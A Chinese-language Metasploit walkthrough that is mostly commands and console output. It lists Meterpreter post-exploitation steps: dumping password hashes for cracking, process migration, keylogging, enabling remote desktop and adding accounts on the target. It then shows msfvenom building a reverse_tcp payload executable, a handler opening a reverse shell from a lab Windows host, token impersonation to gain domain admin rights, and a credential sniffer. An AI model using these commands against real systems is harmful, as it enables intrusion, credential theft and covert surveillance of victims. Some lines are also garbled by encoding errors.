[size=13.3333px]sessions -i 1 //打开建立的第一个会话
getuid //查看UID
sysinfo //查看攻击主机的系统信息
run hashdump //dump目标主机的hash帐号信息,备份进行暴破
ps //查看目标主机进程
migrate 1576(pid) //切换自己为管理员,1576是管理员的进程ID
getuid
keyscan_start //开启健盘记录功能
keyscan_dump //查看健盘记录信息
keyscan_stop //停止健盘记录
run getgui -e //远程开启目标主机的远程桌面
run getgui -u cisco -p cisco //远程添加目标主机帐号密码
rdesktop 192.168.1.100 //远程桌面
实战:
metasploit ip是 192.168.1.3
➜ ~ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f exe >b.exe
No platform was selected, choosing Msf::Module:
latform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes➜ ~ lsDesktop Documents Downloads Library Movies Music Pictures Public VirtualBox VMs b.exe
➜ ~
sf > use exploit/multi/handler
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > run
Started reverse TCP handler on 192.168.1.3:4444 Starting the payload handler...Sending stage (957487 bytes) to 192.168.1.11
Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.11:1027) at 2016-01-20 02:24:05 +0800
获取cmd命令直接输入shell
meterpreter > shell
Process 1600 created.
Channel 1 created.
Microsoft Windows [?汾 5.2.3790]
(C) ?? 1985-2003 Microsoft Corp.
C:\Documents and Settings\Administrator\>
域控提权:
meterpreter > use incognito
Loading extension incognito...success.
use incognito 调用模块命令 成功之后
list_tokens -u 查看域管理
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
XINDONG-58E843E\Administrator
Impersonation Tokens Available
========================================
No tokens available
impersonate_token 你的域管理 比如:impersonate_token XINDONG-58E843E\Administrator
然后shell
就可以获取域管理权限了
以前是说明方法 由于没搭建域控 如果有域控的话 就可以通过以上方法
嗅探:
先exit退出shell
meterpreter > exit Shutting down Meterpreter...
192.168.1.11 - Meterpreter session 1 closed. Reason: User exit
退出后选择嗅探模块
然后run
msf exploit(handler) > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > run Auxiliary module execution completed
msf auxiliary(psnuffle) > Loaded protocol FTP from /opt/metasploit-framework/embedded/framework/data/exploits/psnuffle/ftp.rb... Loaded protocol IMAP from /opt/metasploit-framework/embedded/framework/data/exploits/psnuffle/imap.rb... Loaded protocol POP3 from /opt/metasploit-framework/embedded/framework/data/exploits/psnuffle/pop3.rb... Loaded protocol SMB from /opt/metasploit-framework/embedded/framework/data/exploits/psnuffle/smb.rb... Loaded protocol URL from /opt/metasploit-framework/embedded/framework/data/exploits/psnuffle/url.rb... Sniffing traffic.....